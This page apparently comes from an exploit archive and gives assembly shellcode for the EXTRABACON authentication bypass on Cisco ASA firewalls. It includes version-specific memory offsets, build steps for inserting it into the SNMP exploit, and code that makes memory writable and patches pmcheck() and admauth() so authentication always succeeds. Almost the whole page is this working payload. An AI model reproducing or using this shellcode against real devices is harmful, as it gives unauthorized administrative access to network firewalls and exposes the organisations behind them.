Cisco ASA - Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)

2016-09-16 18:05:12

; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
; Copyright: (c) 2016 RiskSense, Inc. (
; License:
; Release Date: September 15, 2016
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
; Description:
; This is not the same shellcode as the Equation Group version,
; but accomplishes the same task of disabling the auth functions
; in less stages/bytes. Particularly, it is 69 bytes in one stage
; instead of 200+ bytes spread across 2 stages.
; Build/Run:
; 1) $ nasm shelldisable.nasm
; 2) copy resulting shellcode into preamble_byte/preamble_snmp vars
; 3) Change launcher_snmp to 6 nops (or remove entirely)
; Note: The offsets given are for 9.2(3), not part of the original release

SAFERET_OFFSET equ 0x9277386 ; where to continue execution
PMCHECK_BOUNDS equ 0x9b78000 ; mprotect for pmcheck()
PMCHECK_OFFSET equ 0x9b78010 ; location of pmcheck()
ADMAUTH_BOUNDS equ 0x8085000 ; page align for admauth()
ADMAUTH_OFFSET equ 0x8085a40 ; location of admauth()

; we must patch pmcheck() and admauth() to always return true
; xor eax, eax = 31 c0
; inc eax = 40
; ret = c3

PATCH_CODE equ 0xc340c031 ; gotta love endianess

; we need to fix the function frame to continue normal operation
; eax = 0x0
; esi = 0x0
; edi = 0x0b
; ebx = 0x10
; ebp = [esp - 0x4 (ret)] + 0x??
FIX_EBP equ 0x48 ; this is 0x58, etc. in some versions
FIX_EDI equ 0x0f0f0f0b ; seems static?
FIX_EBX equ 0x10 ; seems static?


; these are registers we have to clean up, so we can null them before save
xor eax, eax
xor ebx, ebx
xor esi, esi
xor ecx, ecx ; ecx is volatile register

pusha ; save all registers

add ch, 0x10 ; ecx = 0x1000
add dl, 0x7 ; edx = 0x7
add al, 0x7d ; eax = 0x7d

push eax ; save eax for second call

mov ebx, PMCHECK_BOUNDS ; ebx = byte boundary for mprotect

int 0x80 ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)

pop eax ; eax = 0x7d
mov ebx, ADMAUTH_BOUNDS ; second function page align

int 0x80 ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)

pop eax

mov dword [PMCHECK_OFFSET], eax ; write patch code to both functions
mov dword [ADMAUTH_OFFSET], eax

popa ; restore all registers

push SAFERET_OFFSET ; push the safe return address

; these registers are pre-xored
add bl, FIX_EBX
mov edi, FIX_EDI

mov ebp, esp
add ebp, FIX_EBP

ret ; return to safe address


No fixes

Per poter inviare un fix è necessario essere utenti registrati.